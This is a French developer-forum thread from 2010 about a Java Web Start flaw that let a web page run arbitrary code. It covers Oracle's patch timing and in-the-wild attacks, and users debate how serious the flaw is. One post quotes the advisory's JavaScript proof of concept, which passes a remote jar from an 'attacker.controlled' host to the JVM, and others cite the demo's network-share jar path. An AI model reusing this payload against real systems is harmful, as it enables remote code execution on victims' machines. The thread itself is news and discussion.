IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

  1. #1
    Expert éminent sénior

    Inscrit en
    Juillet 2009
    Messages
    3 407
    Détails du profil
    Informations forums :
    Inscription : Juillet 2009
    Messages : 3 407
    Points : 149 060
    Points
    149 060
    Par défaut Une faille très sérieuse de Java permet de prendre le contrôle d'une machine, passez au JDK/JRE 6 Update 20
    Mise à jour du 15/04/10
    Oracle met à disposition une version correctrice du JRE/JDK : JDK 6 Update 20

    Comme vient de le rapporter HowHigH, Oracle-Sun vient de patcher en urgence la vulnérabilité en sortant un correctif de sécurité
    Les Release Notes
    Téléchargez la dernière version du JRE/JDK 6


    La vulnérabilité de Java déjà exploitée
    Depuis des serveurs russes, Oracle reste sur sa position


    La faille de Java récemment mise à jour par un ingénieur de Google (lire ci-avant) serait déjà exploitée.

    Roger Thompson, chef chercheur chez AVG, a repéré des attaques depuis des serveurs russes utilisés par des sites qui ciblent le grand public (comme Songlyrics.com, qui propose les paroles de chansons de Lady Gaga, Rihanna, etc.).

    En arrivant sur ce site, un iFrame malicieux camouflé dans une publicité redirige l'utilisateur (sans que celui-ci ne s'en aperçoive) vers un serveur hébergeant l'exploit.

    Lors de sa visite, le payload (autrement dit la "charge active" de l'attaque : le code sensé se télécharger sur la machine) n'était pas activé. Roger Thompson suppose donc que toute cette attaque était un test grandeur nature.

    "Le code impliqué [dans l'attaque] est très simple, ce qui le rend facile à reproduire, ce n'est donc pas surprenant que seulement cinq jours après [la découverte de la vulnérabilité de Java], nous détectons ce code dans une attaque qui utilise un serveur Russe" écrit-il sur son blog. Et d'appeler Sun a réagir au plus vite.

    Malheureusement, Oracle-Sun a déjà indiqué qu'à ses yeux cette vulnérabilité n'était pas assez importante pour rompre son cycle de sortie de mises à jour de sécurité. La faille restera donc non-patchée jusqu'à juillet.

    Pour mémoire, la vulnérabilité concerne Java Web Start, une fonctionnalité ajoutée depuis Java 6 qui permet aux développeurs de lancer plus facilement l'exécution de programmes depuis la machine de l'internaute. Une fonctionnalité à double tranchant (c'est en tout cas la présentation qu'en fait Thompson).

    La crainte de beaucoup d'éditeurs de solution de sécurité est de voir arriver un nouveau "toolkits" sur les forums de hackers qui permette d'automatiser l'attaque sans que le pirate n'ait la moindre ligne de code à écrire.

    Face aux accusations d'irresponsabilité qui se multiplient, Oracle reste silencieux (et sur sa position).

    En attendant la réponse du nouveau propriétaire de Sun, les recommandations de Tavis Ormandy, l'ingénieur de Goggle qui a découvert la vulnérabilité de Java, restent bonnes à connaître (lire ci-avant).


    Source : Le billet de Roger Thompson

    Et vous ?

    D'après vous, Oracle est-il "irresponsable" de ne pas sortir un patch en urgence, ou Roger Thompson et ses collègues donnent-ils dans le catastrophisme ?

    MAJ de Gordon Fowler


    Une faille de Java permettrait de prendre le contrôle d'une machine
    Oracle minimise la vulnérabilité découverte par un ingénieur de Google


    Un ingénieur de Google, Tavis Ormandy, vient de mettre à jour une faille de Java qui touche les versions Windows depuis la 6 update 10.

    Après avoir contacté Oracle, Ormandy a reçu pour réponse que la société "ne considère pas cette vulnérabilité suffisamment importante pour rompre le cycle trimestriel de réalisation des patchs". Une appréciation avec laquelle "il n'est pas d'accord".

    L'attaque que permet la faille est pourtant sérieuse puisqu'elle permet à un tiers de lancer un code malveillant et de prendre le contrôle de la machine.

    En résumé, la vulnérabilité vient du fait que Java permet à un développeur d'installer une librairie alternative au lancement d'une JVM. Il suffit donc de créer une librairie "malveillante" et de l'appeler pour lancer un code à l'insu de l'utilisateur.

    Selon Symantec, la faille toucherait également Linux - mais ne serait pas exploitable.

    Plus d'informations sur la faille et sur les parades à adopter en attendant le patch d'Oracle dans le communiqué de Ormandy.

    Source : Le communiqé de Tavis Ormandy et celle de Symantec



    Lire aussi

    Des vulnérabilités découvertes dans Java, déjà patchées par Oracle

    Les rubriques (actus, forums, tutos) de Développez.com :
    Java
    Sécurité
    Windows
    Linux

    Et vous ?

    Cette vulnérabilité vous parait-elle critique ?
    Et d'après vous, Oracle a-t-il raison de ne pas rompre son cycle de sortie de mises à jour de sécurité ?

  2. #2
    Expert éminent sénior
    Avatar de Paul TOTH
    Homme Profil pro
    Freelance
    Inscrit en
    Novembre 2002
    Messages
    8 964
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 55
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Freelance
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Novembre 2002
    Messages : 8 964
    Points : 28 457
    Points
    28 457
    Par défaut
    dont la plus simple pour le grand public est encore de désinstaller Java
    rolala !!! c'est un joli troll ça moi je propose

    - format c:
    - débrancher le câble réseau

  3. #3
    Expert éminent sénior

    Inscrit en
    Juillet 2009
    Messages
    3 407
    Détails du profil
    Informations forums :
    Inscription : Juillet 2009
    Messages : 3 407
    Points : 149 060
    Points
    149 060
    Par défaut
    Citation Envoyé par Paul TOTH Voir le message
    rolala !!! c'est un joli troll ça moi je propose

    - format c:
    - débrancher le câble réseau
    Té non ! Pas de troll !!
    Je retire ce que j'ai dit. Voila c'est fait, j'ai rien dit...

  4. #4
    Membre confirmé Avatar de gmotw
    Profil pro
    Inscrit en
    Mars 2008
    Messages
    384
    Détails du profil
    Informations personnelles :
    Âge : 39
    Localisation : France

    Informations forums :
    Inscription : Mars 2008
    Messages : 384
    Points : 641
    Points
    641
    Par défaut
    De toute manière, il y a des méthodes plus simples indiqués sur le document.

    Par contre, j'ai pas tout capté comment utiliser correctement cette faille, mais ça a l'air de passer par navigateur, c'est ça? Tu envoies vers un lien avec dedans "-jar tonJarTropIvol.jar".

    Donc c'est bien le développeur qui fait son jar super-ivol-trop-méchant, et non pas un développeur qui utilise le jar d'un autre pour y rajouter une librairie pas-gentille-vilaine-bouh-pas-bien.

  5. #5
    Expert éminent sénior

    Inscrit en
    Juillet 2009
    Messages
    3 407
    Détails du profil
    Informations forums :
    Inscription : Juillet 2009
    Messages : 3 407
    Points : 149 060
    Points
    149 060
    Par défaut
    Citation Envoyé par gmotw Voir le message
    Par contre, j'ai pas tout capté comment utiliser correctement cette faille, mais ça a l'air de passer par navigateur, c'est ça?
    Salut,

    T'as une démo (présentée comme sans risque ) ici de comment ça marche :
    http://lock.cmpxchg8b.com/bb5eafbc6c.../testcase.html

  6. #6
    Membre régulier
    Profil pro
    Inscrit en
    Décembre 2009
    Messages
    39
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2009
    Messages : 39
    Points : 80
    Points
    80
    Par défaut
    Bof, comme d'habitude -dans sa config par défaut- cela nécessite l'approbation de l'utilisateur (regardez votre config de Java Web Start, vous verrez bien).
    Second point, si le JAR invoqué de manière détournée s'avère être dangereux, alors votre super-antivirus le détectera, comme d'hab.
    Le soucis est que l'on parle ici d'un individu sans antivirus (ou quelconque solution de sécurité) cliquant frénétiquement sur "Yes" et "Next".

    Alors si demander à l'utilisateur s'il veut installer XXX est ce qu'on appelle une faille de sécurité, je tiens à rappeler la plus grande faille toujours pas colmatée et exploitée depuis des temps immémoriaux : la bêtise humaine & son appétence à manipuler sans chercher à comprendre.

    Non vraiment, ça n'a rien de critique.

    [edit] Ajoutons que les paramètres de sécurité par défaut de Vista & Seven préviennent efficacement de ce genre de manip ^^.
    Rien à craindre donc.

  7. #7
    Rédacteur
    Avatar de pseudocode
    Homme Profil pro
    Architecte système
    Inscrit en
    Décembre 2006
    Messages
    10 062
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 51
    Localisation : France, Hérault (Languedoc Roussillon)

    Informations professionnelles :
    Activité : Architecte système
    Secteur : Industrie

    Informations forums :
    Inscription : Décembre 2006
    Messages : 10 062
    Points : 16 084
    Points
    16 084
    Par défaut
    +1

    Accepter le lancement une appli WebStart, c'est déjà le début de la fin de la sécurité. C'est un peu l'équivalent de lancer un exécutable reçu en piece-jointe d'un mail.

  8. #8
    Membre expérimenté
    Avatar de Patriarch24
    Homme Profil pro
    Ingénieur développement logiciels
    Inscrit en
    Septembre 2003
    Messages
    1 047
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 41
    Localisation : France

    Informations professionnelles :
    Activité : Ingénieur développement logiciels
    Secteur : Industrie

    Informations forums :
    Inscription : Septembre 2003
    Messages : 1 047
    Points : 1 640
    Points
    1 640
    Par défaut
    Accepter le lancement une appli WebStart, c'est déjà le début de la fin de la sécurité.
    Oui, mais il existe ce qu'on appelle des signatures numériques pour identifier les "applications de confiance". Ou alors, n'acceptons plus aucun certificat...

    Quant à la faille, elle se situe probablement quelque part entre le clavier et la chaise.

  9. #9
    Membre confirmé Avatar de gmotw
    Profil pro
    Inscrit en
    Mars 2008
    Messages
    384
    Détails du profil
    Informations personnelles :
    Âge : 39
    Localisation : France

    Informations forums :
    Inscription : Mars 2008
    Messages : 384
    Points : 641
    Points
    641
    Par défaut
    Citation Envoyé par Gordon Fowler Voir le message
    Salut,

    T'as une démo (présentée comme sans risque ) ici de comment ça marche :
    http://lock.cmpxchg8b.com/bb5eafbc6c.../testcase.html
    Duh, proxy.

    Sinon sur le communiqué, il donne ça comme exemple:
    var o = document.createElement("OBJECT");
    o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
    o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
    Du coup, je voulais justement savoir pour les gens comme moi qui n'ont pas accès à l'autre document si c'était juste dans ce genre d'utilisation qu'il considérait la faille. (parce que du coup effectivement, c'est peut-être un peu moins catastrophique)

  10. #10
    Membre éclairé Avatar de JoeChip
    Profil pro
    Inscrit en
    Septembre 2008
    Messages
    536
    Détails du profil
    Informations personnelles :
    Localisation : Belgique

    Informations forums :
    Inscription : Septembre 2008
    Messages : 536
    Points : 803
    Points
    803
    Par défaut
    Accepter le lancement une appli WebStart, c'est déjà le début de la fin de la sécurité.
    Alors accepter d'installer une application, c'est le début de la fin de la sécurité... Pour avoir une sécurité absolue, il faut un ordi sans connexion au net, sans applications installée, et sans OS. Un ordinateur éteint, quoi.

  11. #11
    Membre à l'essai
    Inscrit en
    Janvier 2010
    Messages
    12
    Détails du profil
    Informations forums :
    Inscription : Janvier 2010
    Messages : 12
    Points : 21
    Points
    21
    Par défaut
    La démo est bloquée par avast en tout cas.
    Donc effectivement se balader à poil sur internet est une faille critique.
    On ne patchera jamais l'utilisateur...

    Je trouve que les annonces de failles "critique", c'est pratiquement de la désinformation, un peu comme quand l'état communique sur les "dangers" d'internet.

    PS:
    7 ans de lecture
    4 mois d'inscription
    1er Message... => Bonjour à tous

  12. #12
    Membre du Club
    Profil pro
    Inscrit en
    Novembre 2005
    Messages
    46
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Novembre 2005
    Messages : 46
    Points : 46
    Points
    46
    Par défaut
    Tiens tiens, on se dit tous que cette faille n'est pas critique, car on n'est pas des users Next-Next-Finish, que l'AV est censé nous prévenir en cas de JAR trop malveillant, etc..

    POURTANT (et je suis peu surpris..), l'exploit fonctionne correctement à mon boulot. Aucune action n'est demandée à l'utilisateur, la calculette se lance toute seule.. Donc même si vous, en tant que particulier, vous pensez que le risque est mineur, sachez que pour des entreprises (très grand groupe pourtant!) le risque est bien réel. Quand on voit que ce type de faille n'est pas détecté dans de grosse société, il ne faut pas penser que l'impact est mineur.

  13. #13
    Rédacteur
    Avatar de pseudocode
    Homme Profil pro
    Architecte système
    Inscrit en
    Décembre 2006
    Messages
    10 062
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 51
    Localisation : France, Hérault (Languedoc Roussillon)

    Informations professionnelles :
    Activité : Architecte système
    Secteur : Industrie

    Informations forums :
    Inscription : Décembre 2006
    Messages : 10 062
    Points : 16 084
    Points
    16 084
    Par défaut
    Citation Envoyé par JoeChip Voir le message
    Alors accepter d'installer une application, c'est le début de la fin de la sécurité... Pour avoir une sécurité absolue, il faut un ordi sans connexion au net, sans applications installée, et sans OS. Un ordinateur éteint, quoi.
    Oui. Avec les OS actuels, installer une application c'est accepter un risque de compromission de ses données.

    Je dis "avec les OS actuels" car (sauf SE Linux) il n'y a pas de firewall applicatif (sandbox) intégré a l'OS. La sécurité est à la charge de l'application (ici le runtime Java), quand elle y pense et si elle fonctionne.

    Citation Envoyé par Vincent M Voir le message
    PS:
    7 ans de lecture
    4 mois d'inscription
    1er Message... => Bonjour à tous
    Bienvenue à ton 1er commentaire


  14. #14
    Expert éminent sénior
    Avatar de tchize_
    Homme Profil pro
    Ingénieur développement logiciels
    Inscrit en
    Avril 2007
    Messages
    25 482
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 45
    Localisation : Belgique

    Informations professionnelles :
    Activité : Ingénieur développement logiciels
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Avril 2007
    Messages : 25 482
    Points : 48 804
    Points
    48 804
    Par défaut
    pour ce qui est des certificats, ils n'entrent pas en compte, la technique présentée permet justement de contourner la sandbox de sécurité et passant directement des paramètre à la jvm qui va servir à webstart. On pourrait par exemple lui passer un xxxAgent, qui intercepterais tout, et travaille plus bas que le securitymanager -> pas de securitymanager pour lui.


    Note que chez moi la démo marche pas (unable to access jar file).


    Je suis cependant d'accord avec la décision "ce n'est pas critique, ca peut attendre le patch trimestriel". Pourquoi? Tout simplement parce qu'un workaround existe ne nécessitant pas de patch.

  15. #15
    Expert éminent sénior
    Avatar de tchize_
    Homme Profil pro
    Ingénieur développement logiciels
    Inscrit en
    Avril 2007
    Messages
    25 482
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 45
    Localisation : Belgique

    Informations professionnelles :
    Activité : Ingénieur développement logiciels
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Avril 2007
    Messages : 25 482
    Points : 48 804
    Points
    48 804
    Par défaut
    Citation Envoyé par tchize_ Voir le message
    Note que chez moi la démo marche pas (unable to access jar file).
    Après vérification, l'url est de la forme
    "\\\\lock.cmpxchg8b.com\\calc.jar"

    Clairement, il s'agit d'utiliser le protocole de partage réseau de windows pour accéder comme à un fichier local à ce jar. La plupart des machine n'y auront pas accès (port bloqué par routeur, etc).

    Dans ma boite, le jar est innacessible.

  16. #16
    Membre expérimenté

    Inscrit en
    Décembre 2004
    Messages
    584
    Détails du profil
    Informations forums :
    Inscription : Décembre 2004
    Messages : 584
    Points : 1 374
    Points
    1 374
    Par défaut
    Ce type de situation où quelqu'un reproche à un éditeur de ne pas patcher assez vite une faille importante avec solution de prévention connue est elle unique à Oracle ?

    En effet, je pense que ce type de situation est assez fréquent, tout éditeur confondu. Suis je dans le vrai ? Si oui, pourquoi alors mettre en avant ce cas spécifique ? A t il quelque chose de distinctif par rapport aux autres occurrences de ce type ?

  17. #17
    Expert éminent sénior
    Avatar de tchize_
    Homme Profil pro
    Ingénieur développement logiciels
    Inscrit en
    Avril 2007
    Messages
    25 482
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 45
    Localisation : Belgique

    Informations professionnelles :
    Activité : Ingénieur développement logiciels
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Avril 2007
    Messages : 25 482
    Points : 48 804
    Points
    48 804
    Par défaut
    il est limité dans son usage (faut passer par un montage CIFS pour accéder au jar dans son url, car la jvm ne prend que des jar locaux dans sa ligne de commande). Comme souvent, dans les faille "critique", il y a des boites de securité derrière qui ont besoin de faire parler d'elle. Je vois de plus en plus souvent sur ces alertes de sécurité, des problème moyen, qui pourraient attendre quelques semaines, criés sur tous les toits pour bien montrer le nom de la boite. Et cette alerte n'y échappe pas:

    Some very elite friends have started a consultancy called inverse path, you
    should really hire them.
    Croire que sa découverte a plus de poids que les autre failles de sécurité déjà découverte en java et patchées régulièrement, c'est un peu de la prétention...

  18. #18
    Membre confirmé Avatar de gmotw
    Profil pro
    Inscrit en
    Mars 2008
    Messages
    384
    Détails du profil
    Informations personnelles :
    Âge : 39
    Localisation : France

    Informations forums :
    Inscription : Mars 2008
    Messages : 384
    Points : 641
    Points
    641
    Par défaut
    Ah ouais, quand même...


    ("Je viens de trouver une faille à Java, quand on double clique dessus, ça se lance! Par ailleurs, j'ai deux trois potes qui cherchent du boulot")

  19. #19
    Membre actif

    Inscrit en
    Juin 2005
    Messages
    212
    Détails du profil
    Informations forums :
    Inscription : Juin 2005
    Messages : 212
    Points : 229
    Points
    229
    Billets dans le blog
    1
    Par défaut
    Citation Envoyé par Gordon Fowler Voir le message
    T'as une démo (présentée comme sans risque ) ici de comment ça marche :
    http://lock.cmpxchg8b.com/bb5eafbc6c.../testcase.html
    Et bien chez moi ça peut marcher :
    Si IE8 bloque avec le message :unable to access jarfile \\lock.cmpxchg8b.com\calc.jar , avec Ffx 3.6.3 ça passe et sans aucune demande de validation par l'utilisateur, donc je rejoins :
    Citation Envoyé par tittoto Voir le message
    POURTANT (et je suis peu surpris..), l'exploit fonctionne correctement à mon boulot. Aucune action n'est demandée à l'utilisateur, la calculette se lance toute seule.. Donc même si vous, en tant que particulier, vous pensez que le risque est mineur, sachez que pour des entreprises (très grand groupe pourtant!) le risque est bien réel. Quand on voit que ce type de faille n'est pas détecté dans de grosse société, il ne faut pas penser que l'impact est mineur.
    +1
    Car rien ne me garantit que la jvm ne puisse être contournée pour exécuter un jar externe, et dans un environnement d'entreprise, c'est problématique

    PS : En fait l'info été disponible depuis vendredi, perso j'avais vu cette vulnérabilité dimanche et je m'étais étonné de ne pas la retrouver sur les actu sécu de dvp .. ça dort le week-end ?

  20. #20
    Expert éminent sénior
    Avatar de tchize_
    Homme Profil pro
    Ingénieur développement logiciels
    Inscrit en
    Avril 2007
    Messages
    25 482
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 45
    Localisation : Belgique

    Informations professionnelles :
    Activité : Ingénieur développement logiciels
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Avril 2007
    Messages : 25 482
    Points : 48 804
    Points
    48 804
    Par défaut
    Citation Envoyé par kimz Voir le message
    PS : En fait l'info été disponible depuis vendredi, perso j'avais vu cette vulnérabilité dimanche et je m'étais étonné de ne pas la retrouver sur les actu sécu de dvp .. ça dort le week-end ?
    En ce qui me concerne, j'enlevait 100m² de plafonnage dans mon chez moi, et j'ai trouvé des vulnérabilité de ma maison, qui serait sensible aux attaque de moustique et de pluie

Discussions similaires

  1. Réponses: 10
    Dernier message: 28/10/2010, 10h47
  2. Réponses: 90
    Dernier message: 09/10/2010, 13h54
  3. Réponses: 4
    Dernier message: 12/04/2010, 18h05
  4. Réponses: 61
    Dernier message: 27/11/2009, 12h15
  5. Réponses: 0
    Dernier message: 26/08/2009, 08h26

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo